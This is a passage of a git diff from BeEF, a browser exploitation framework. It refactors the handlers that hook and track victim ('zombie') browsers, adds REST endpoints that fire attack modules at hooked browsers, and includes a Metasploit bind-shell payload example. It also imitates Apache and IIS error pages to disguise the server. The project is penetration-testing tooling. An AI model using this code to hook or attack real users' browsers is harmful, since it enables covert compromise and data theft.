@options[:verbose] = true
end
end
optparse.parse!
@already_parsed = true
@options
optparse.parse!
@already_parsed = true
@options
rescue OptionParser::InvalidOption => e
puts "Invalid command line option provided. Please run beef --help"
exit 1

13
core/main/crypto.rb
View File

@@ -36,6 +36,19 @@ module Core
# return random hex string
return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
end
# Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
# After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
# @return [String] Security token
def self.api_token
config = BeEF::Core::Configuration.instance
token_length = 20
# return random hex string
token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
config.set('beef.api_token', token)
token
end
end
end

31
extensions/initialization/handler.rb → core/main/handlers/browserdetails.rb
View File

@@ -14,18 +14,15 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
#
# The http handler that manages the return of the initial browser details.
#
class Handler
module Core
module Handlers
# @note Retrieves information about the browser (type, version, plugins etc.)
class BrowserDetails
@data = {}
HB = BeEF::Core::Models::HookedBrowser
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(data)
@data = data
@@ -33,7 +30,7 @@ module BeEF
end
def err_msg(error)
print_error "[INITIALIZATION] #{error}"
print_error "[Browser Details] #{error}"
end
def setup()
@@ -169,22 +166,6 @@ module BeEF
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
end
# get and store the internal ip address
internal_ip = get_param(@data['results'], 'InternalIP')
if BeEF::Filters.is_valid_ip?(internal_ip)
BD.set(session_id, 'InternalIP', internal_ip)
else
self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
end
# get and store the internal hostname
internal_hostname = get_param(@data['results'], 'InternalHostname')
if BeEF::Filters.is_valid_hostname?(host_name)
BD.set(session_id, 'InternalHostname', internal_hostname)
else
self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
end
# get and store the hooked browser type
browser_type = get_param(@data['results'], 'BrowserType')
if BeEF::Filters.is_valid_browsertype?(browser_type)

4
core/main/handlers/commands.rb
View File

@@ -55,9 +55,11 @@ module Handlers
beefhook = get_param(@data, 'beefhook')
(print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
result = get_param(@data, 'results')
# @note create the command module to handle the response
command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
command.build_callback_datastore(@http_params, @http_header)
command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
command.session_id = beefhook
if command.respond_to?(:post_execute)
command.post_execute

55
core/main/handlers/hookedbrowsers.rb
View File

@@ -18,42 +18,44 @@ module Core
module Handlers
# @note This class handles connections from hooked browsers to the framework.
class HookedBrowsers
class HookedBrowsers < BeEF::Core::Router::Router
include BeEF::Core::Handlers::Modules::BeEFJS
include BeEF::Core::Handlers::Modules::Command
#antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
configure do
disable :protection
end
# Process HTTP requests sent by a hooked browser to the framework.
# It will update the database to add or update the current hooked browser
# and deploy some command modules or extensions to the hooked browser.
def call(env)
get '/' do
@body = ''
@request = Rack::Request.new(env)
@params = @request.query_string
@response = Rack::Response.new(body=[], 200, header={})
@params = request.query_string
#@response = Rack::Response.new(body=[], 200, header={})
config = BeEF::Core::Configuration.instance
# @note check source ip address of browser
permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
target_network = IPAddr.new(permitted_hooking_subnet)
if not target_network.include?(@request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
@response = Rack::Response.new(body=[], 500, header={})
return
if not target_network.include?(request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
error 500
end
# @note get zombie if already hooked the framework
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_id = @request[hook_session_name]
hook_session_id = request[hook_session_name]
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?
# @note is a new browser so return instructions to set up the hook
if not hooked_browser
# @note generate the instructions to hook the browser
host_name = @request.host
host_name = request.host
(print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
build_beefjs!(host_name)
@@ -63,9 +65,9 @@ module Handlers
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != @request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
hooked_browser.ip = @request.ip
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
hooked_browser.count!
@@ -76,37 +78,18 @@ module Handlers
zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}
# @note We dynamically get the list of all browser hook handler using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
end
# @note set response headers and body
@response = Rack::Response.new(
body = [@body],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST, GET'
}
)
@body
end
private
# @note Object representing the HTTP request
@request
# @note Object representing the HTTP response
@response
# @note A string containing the list of BeEF components active in the hooked browser
# @todo Confirm this variable is still used
@beef_js_cmps
end
end

17
extensions/initialization/models/browserdetails.rb → core/main/models/browserdetails.rb
View File

@@ -14,8 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
module Core
module Models
#
# Table stores the details of browsers.
@@ -26,16 +25,7 @@ module Models
include DataMapper::Resource
storage_names[:default] = 'extension_initialization_browserdetails'
#
# Class constructor
#
def initialize(config)
super(config)
end
storage_names[:default] = 'core_browserdetails'
property :session_id, String, :length => 255, :key => true
property :detail_key, String, :length => 255, :lazy => false, :key => true
property :detail_value, Text, :lazy => false
@@ -59,7 +49,7 @@ module Models
return nil if not get(session_id, detail_key).nil?
# store the returned browser details
browserdetails = BeEF::Extension::Initialization::Models::BrowserDetails.new(
browserdetails = BeEF::Core::Models::BrowserDetails.new(
:session_id => session_id,
:detail_key => detail_key,
:detail_value => detail_value)
@@ -120,4 +110,3 @@ module Models
end
end
end
end

2
core/main/models/commandmodule.rb
View File

@@ -28,8 +28,6 @@ module Models
property :path, Text, :lazy => false
has n, :commands
has 1, :dynamic_command_info
end
end

1
core/main/network_stack/assethandler.rb
View File

@@ -56,6 +56,7 @@ module Handlers
@allocations.delete(url)
@http_server.unmount(url)
@http_server.remap
print_info "Url [" + url + "] unmounted"
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated

66
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -19,7 +19,7 @@ module NetworkStack
module Handlers
# @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
class DynamicReconstruction
class DynamicReconstruction < BeEF::Core::Router::Router
# @note holds packet queue
PQ = Array.new()
@@ -27,50 +27,33 @@ module Handlers
# @note obtain dynamic mount points from HttpHookServer
MOUNTS = BeEF::Core::Server.instance.mounts
before do
error 404 unless !params.empty?
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Combines packet information and pushes to PQ (packet queue), then checks packets
def call(env)
@request = Rack::Request.new(env)
# skip packet checking if the request method is HEAD, PUT, DELETE or if parameters == null
if not self.is_valid_req(@request)
response = Rack::Response.new(
body = [],
status = 404,
header = {
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
}
)
return response
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
get '/' do
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
}
)
'Access-Control-Allow-Methods' => 'POST, GET'
PQ << {
:beefhook => @request['bh'],
:stream_id => Integer(@request['sid']),
:packet_id => Integer(@request['pid']),
:packet_count => Integer(@request['pc']),
:data => @request['d']
:beefhook => params[:bh],
:stream_id => Integer(params[:sid]),
:packet_id => Integer(params[:pid]),
:packet_count => Integer(params[:pc]),
:data => params[:d]
}
# @todo Test under high load, possibly limit the amount of threads being created
Thread.new {
check_packets()
}
response
end
# Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
@@ -99,8 +82,8 @@ module Handlers
begin
res = JSON.parse(b64).first
res['beefhook'] = packet[:beefhook]
res['request'] = @request
res['beefsession'] = @request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
res['request'] = request
res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
execute(res)
rescue JSON::ParserError => e
print_debug 'Network stack could not decode packet stream.'
@@ -132,17 +115,6 @@ module Handlers
end
end
end
# 1. check methods HEAD, PUT, DELETE. return 404 if these methods are called
# 2. check for parameters = null (no parameters). return 404 in this case
# @param [Hash] request the Rack HTTP Request.
def is_valid_req(request)
is_valid = true
if request.put? or request.delete? or request.head? or request.params.empty?
is_valid = false
end
is_valid
end
# Assist function for getting parameter from hash
# @param [Hash] query Hash to pull key from
@@ -152,9 +124,7 @@ module Handlers
return nil if query[key].nil?
query[key]
end
end
end
end
end

64
core/main/rest/api.rb Normal file
View File

@@ -0,0 +1,64 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
module RegisterHooksHandler
def self.mount_handler(server)
server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
end
end
module RegisterModulesHandler
def self.mount_handler(server)
server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
end
end
module RegisterAdminHandler
def self.mount_handler(server)
server.mount('/api/admin', BeEF::Core::Rest::Admin.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet
# This is from extensions/admin_ui/controllers/authentication/authentication.rb
#
def self.permitted_source?(ip)
# get permitted subnet
permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
target_network = IPAddr.new(permitted_ui_subnet)
# test if ip within subnet
return target_network.include?(ip)
end
end
end
end

75
core/main/rest/handlers/admin.rb Normal file
View File

@@ -0,0 +1,75 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Admin < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
# error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Authenticate using the config set username/password to retrieve the "token" used for subsquent calls.
# Return the secret token used for subsquene tAPI calls.
#
# Input must be specified in JSON format
#
# +++ Example: +++
#POST /api/admin/login HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"username":"beef", "password":"beef"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","token":"122323121"}
#
post '/login' do
request.body.rewind
begin
data = JSON.parse request.body.read
# check username and password
if not (data['username'].eql? config.get('beef.credentials.user') and data['password'].eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{request.ip} has failed to authenticate in the application.")
halt 401
else
{ "success" => true,
"token" => "#{config.get('beef.api_token')}"
}.to_json
end
rescue Exception => e
error 400
end
end
private
end
end
end
end

89
core/main/rest/handlers/hookedbrowsers.rb Normal file
View File

@@ -0,0 +1,89 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class HookedBrowsers < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
output = {
'hooked-browsers' => {
'online' => online_hooks,
'offline' => offline_hooks
}
}
output.to_json
end
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
result = {}
details.each do |property|
result[property.detail_key] = property.detail_value
end
result.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
hbs.each do |hb|
hbs_hash[i] = (get_hb_details(hb))
i+=1
end
hbs_hash
end
def get_hb_details(hb)
details = BeEF::Core::Models::BrowserDetails
{
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'session' => hb.session,
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
end
end
end
end

73
core/main/rest/handlers/logs.rb Normal file
View File

@@ -0,0 +1,73 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Logs < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all global logs
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
# @note Get hooked browser logs
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
logs_to_json(logs)
end
private
def logs_to_json(logs)
logs_json = []
count = logs.length
logs.each do |log|
logs_json << {
'id' => log.id.to_i,
'date' => log.date.to_s,
'event' => log.event.to_s,
'type' => log.type.to_s
}
end
{
'logs_count' => count,
'logs' => logs_json
}.to_json if not logs_json.empty?
end
end
end
end
end

147
core/main/rest/handlers/modules.rb Normal file
View File

@@ -0,0 +1,147 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Modules < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all available and enabled modules (id, name, category)
get '/' do
mods = BeEF::Core::Models::CommandModule.all
mods_hash = {}
i = 0
mods.each do |mod|
modk = BeEF::Module.get_key_by_database_id(mod.id)
next if !BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'class' => config.get("beef.module.#{modk}.class"),
'name' => config.get("beef.module.#{modk}.name"),
'category' => config.get("beef.module.#{modk}.category")
}
i+=1
end
mods_hash.to_json
end
# @note Get the module definition (info, options)
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
#todo check if it's possible to also retrieve the TARGETS supported
{
'name' => cmd.name,
'description' => config.get("beef.module.#{cmd.name}.description"),
'category'=> config.get("beef.module.#{cmd.name}.category"),
'options' => BeEF::Module.get_options(modk) #todo => get also payload options..get_payload_options(modk,text)
}.to_json
end
# @note Get the module result for the specific executed command
#
# Example with the Alert Dialog
#GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
#Host: 127.0.0.1:3000
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
end
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
#
# +++ Example with the Alert Dialog: +++
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"text":"michele"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"1"}
#
# +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
# +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
# +++ this is why there is "command_id":"not_available" in the response
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 81
#
#{"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
request.body.rewind
begin
data = JSON.parse request.body.read
options = []
data.each{|k,v| options.push({'name' => k, 'value' => v})}
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
rescue Exception => e
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
end
end
end
end
end

28
core/main/models/dynamiccommandinfo.rb → core/main/router/api.rb
View File

@@ -14,23 +14,17 @@
# limitations under the License.
#
module BeEF
module Core
module Models
module Core
module Router
class DynamicCommandInfo
include DataMapper::Resource
storage_names[:default] = 'core_dynamiccommandinfo'
property :id, Serial
property :name, Text, :lazy => false
property :description, Text, :lazy => false
property :targets, Text, :lazy => false
belongs_to :command_module
module RegisterRouterHandler
def self.mount_handler(server)
server.mount('/', BeEF::Core::Router::Router.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
end
end
end
end
end

258
core/main/router/router.rb Normal file
View File

@@ -0,0 +1,258 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Router
#@note This is the main Router parent class.
#@note All the HTTP handlers registered on BeEF will extend this class.
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do
set :show_exceptions, false
end
# @note Override default 404 HTTP response
not_found do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
#response body
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" +
"<html><head>" +
"<title>404 Not Found</title>" +
"</head><body>" +
"<h1>Not Found</h1>" +
"<p>The requested URL was not found on this server.</p>" +
"<hr>" +
"<address>Apache/2.2.3 (CentOS)</address>" +
"</body></html>"
when "iis"
#response body
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">" +
"<HTML><HEAD><TITLE>The page cannot be found</TITLE>" +
"<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<STYLE type=\"text/css\">" +
" BODY { font: 8pt/12pt verdana } " +
" H1 { font: 13pt/15pt verdana }" +
" H2 { font: 8pt/12pt verdana }" +
" A:link { color: red }" +
" A:visited { color: maroon }" +
"</STYLE>" +
"</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>" +
"<h1>The page cannot be found</h1>" +
"The page you are looking for might have been removed, had its name changed, or is temporarily unavailable." +
"<hr>" +
"<p>Please try the following:</p>" +
"<ul>" +
"<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>" +
"<li>If you reached this page by clicking a link, contact" +
" the Web site administrator to alert them that the link is incorrectly formatted." +
"</li>" +
"<li>Click the <a href=\"javascript:history.back(1)\">Back</a> button to try another link.</li>" +
"</ul>" +
"<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>" +
"<hr>" +
"<p>Technical Information (for support personnel)</p>" +
"<ul>" +
"<li>Go to <a href=\"http://go.microsoft.com/fwlink/?linkid=8180\">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>" +
"<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr)," +
"and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
"</ul>" +
"</TD></TR></TABLE></BODY></HTML>"
else
"Not Found."
end
else
"Not Found."
end
end
before do
# @note Override Server HTTP response header
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\">" +
"<head>" +
"<title>Apache HTTP Server Test Page powered by CentOS</title>" +
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />" +
"<style type=\"text/css\">" +
"body {" +
"background-color: #fff; " +
"color: #000;" +
"font-size: 0.9em;" +
"font-family: sans-serif,helvetica;" +
"margin: 0;" +
"padding: 0; " +
"} " +
":link { " +
"color: #0000FF; " +
"} " +
":visited { " +
"color: #0000FF; " +
"} " +
"a:hover { " +
"color: #3399FF; " +
"} " +
"h1 { " +
" text-align: center; " +
" margin: 0; " +
" padding: 0.6em 2em 0.4em; " +
" background-color: #3399FF;" +
" color: #ffffff; " +
" font-weight: normal; " +
" font-size: 1.75em; " +
" border-bottom: 2px solid #000; " +
"} " +
"h1 strong {" +
"font-weight: bold; " +
"} " +
"h2 { " +
" font-size: 1.1em;" +
"font-weight: bold; " +
"} " +
".content { " +
" padding: 1em 5em; " +
"} " +
".content-columns { " +
" /* Setting relative positioning allows for " +
" absolute positioning for sub-classes */ " +
" position: relative; " +
" padding-top: 1em; " +
"} " +
".content-column-left { " +
" /* Value for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-right: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-column-right { " +
" /* Values for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-left: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-columns>.content-column-left, .content-columns>.content-column-right {" +
" /* Non-IE/Win */" +
"} " +
"img { " +
" border: 2px solid #fff; " +
" padding: 2px; " +
" margin: 2px; " +
"} " +
"a:hover img { " +
" border: 2px solid #3399FF; " +
"} " +
"</style> " +
"</head> " +
"<body> " +
"<h1>Apache 2 Test Page<br><font size=\"-1\"><strong>powered by</font> CentOS</strong></h1>" +
"<div class=\"content\">" +"<div class=\"content-middle\">" +
"<p>This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page it means that the Apache HTTP server installed at this site is working properly.</p>" +
"</div>" +
"<hr />" +
"<div class=\"content-columns\">" +
"<div class=\"content-column-left\"> " +
"<h2>If you are a member of the general public:</h2>" +
"<p>The fact that you are seeing this page indicates that the website you just visited is either experiencing problems or is undergoing routine maintenance.</p>" +
"<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name \"webmaster\" and directed to the website's domain should reach the appropriate person.</p> " +
"<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to \"webmaster@example.com\".</p>" +
"</div>" +
"<div class=\"content-column-right\">" +
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
" <div class=\"content\">" +
